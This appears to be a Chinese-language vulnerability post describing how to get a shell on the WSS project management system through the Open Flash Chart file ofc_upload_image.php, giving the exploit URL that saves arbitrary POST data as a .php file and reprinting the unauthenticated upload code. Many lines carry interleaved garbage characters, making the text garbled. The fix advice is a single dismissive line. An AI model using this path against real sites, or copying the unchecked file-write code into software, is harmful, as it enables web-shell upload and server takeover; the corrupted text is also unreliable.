WSS项目管理系统Post get shell

admin

POST 数据漏洞文件执行任意后缀文件保存
2 o5 N! J# [6 s! L, k( e% ~* O 漏洞文件/chart/php-ofc-library/ofc_upload_image.php
6 r- ]; Z8 v6 N! J- h
3 C! D. r) K2 l$ r利用：
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名

Post任意数据
2 Q% C* \1 m3 g" W! [7 M: P保存位置http://localhost/chart/tmp-upload-images/hfy.php


最新版wss漏洞文件，即使是收费版本也有的，在新浪商店部署的demo~
2 z! {5 f* p- N& `+ M5 |
/ l6 h9 o6 B7 V% T1 r- j<?php

//
8 [. Y) X) \" P" {/ T+ u// In Open Flash Chart -> save_image debug mode, you
// will see the 'echo' text in a new window.
& O0 m" H' ~) Q//
4 M" s" g% I/ D* P
/*

; [! z( }2 ?6 c, U& _print_r( $_GET );
print_r( $_POST );
$ \7 O: i- V: g) t$ W" y# Wprint_r( $_FILES );

print_r( $GLOBALS );
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
  L( e& s4 v2 y3 o" I& C* I8 L: x
) \' Y: ]9 C4 g% O" E) V*/
5 F+ O; ^" x+ E// default path for the image to be stored //
" f1 ~* G$ p( J( ^% l/ w1 @% }$default_path = '../tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);
( s, J0 ^- w# o1 k
// full path to the saved image including filename //
5 o( H  N5 I8 O' ?# N* Q1 o2 R$destination = $default_path . basename( $_GET[ 'name' ] );
% L1 x. m5 Y, ~. F% k) O
echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;
1 E7 ]2 q1 t; j! O  b9 p5 ~  p8 G8 T) }
5 H( ~6 f8 f3 ]2 R( J, [' i2 C# f//
2 P# I% Y0 ~) h4 H// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
0 ]- `0 p# U8 ~& ~// the raw bits into $HTTP_RAW_POST_DATA
6 `9 X8 {7 Q# f, d5 X6 \; P//

0 C+ v# `8 t1 n  X. C& \" A$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
& G  k0 a# Q5 K; R: Lfclose($jfh);

; B5 K- P  F+ p! u$ r, o( m' @( A//
// LOOK:
  O! Q& E' S' O' P//
exit();
* Y' O: e& i( f+ Q# i4 H' M( |4 V3 `//
0 ?* p+ J6 z6 T) i- m6 w5 `- E// PHP5:
//
2 k5 J+ D8 v) g
" K  h* L& s$ X# o5 v9 ?9 E5 N
// default path for the image to be stored //
! |* Z; e* ^" l0 v4 m: \! S$default_path = 'tmp-upload-images/';

4 @' E  a. ?% v3 e% `  s5 dif (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
! b) p% o9 J: ^" @) X! T
// move the image into the specified directory //
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
" G5 Z. ~  B/ E. F    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
} else {
5 D1 g! I" h% _* w8 C7 d- w    echo "FILE UPLOAD FAILED";
}
/ J4 K" ^8 Y' `( p; A0 ^

?>


# H$ ^4 B% O6 A+ F2 d4 L

. Q, o4 w$ r( j  a1 J0 _1 G  y$ n  X2 K
2 L5 B/ g' c" S! I6 V
修复方案：
* }, P/ P' E! i" s0 _这个漏洞文件就是个杯具，怎么破，加权限验证，后缀等验证~，自己搞


! ^9 D8 _0 v' Y. p* `6 \" L2 ^& O